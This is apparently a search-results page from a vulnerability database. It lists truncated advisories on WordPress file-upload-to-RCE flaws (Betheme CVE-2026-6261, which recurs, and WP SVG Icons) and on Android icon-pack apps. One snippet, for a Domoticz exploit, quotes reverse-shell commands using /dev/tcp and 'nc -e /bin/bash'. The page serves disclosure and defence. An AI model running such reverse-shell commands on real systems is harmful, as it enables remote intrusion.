8 matches found
CVE-2026-6261 Betheme <= 28.4 - Authenticated (Author+) Arbitrary File Upload to Remote Code Execution via Icon Pack Upload
The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the uploadicons function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it...
CVE-2026-6261
The Betheme theme for WordPress (up to version 28.4) is vulnerable to Arbitrary File Upload via the upload_icons workflow. The root cause is that user-controlled ZIPs are moved and unzipped into a public uploads directory without validating extracted file types. Authenticated attackers with autho...
CVE-2026-6261 Betheme <= 28.4 - Authenticated (Author+) Arbitrary File Upload to Remote Code Execution via Icon Pack Upload
The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the uploadicons function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it...
CVE-2026-6261
The Betheme theme for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 28.4. This is due to the uploadicons function workflow moving and unzipping user-controlled ZIP files into a public uploads directory without validating extracted file types. This makes it...
PT-2022-13482 · WordPress · Wp Svg Icons
Name of the Vulnerable Software and Affected Versions: WP SVG Icons WordPress plugin versions 3.2.3 and earlier Description: The issue allows a high-privileged user, such as an admin, to upload a zip file containing malicious PHP code, leading to remote code execution. This is due to the plugin n...
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Glim - Free Flat Icon Pack - Dangerous filesystem permissions, WebView code execution vulnerabilities
HackApp vulnerability scanner discovered that application Glim - Free Flat Icon Pack published at the 'play' market has multiple vulnerabilities...
Glasklart - Icon Pack - Base64 encoded String, Customized SSL, Exported ContentProvider vulnerabilities
HackApp vulnerability scanner discovered that application Glasklart - Icon Pack published at the 'play' market has multiple vulnerabilities...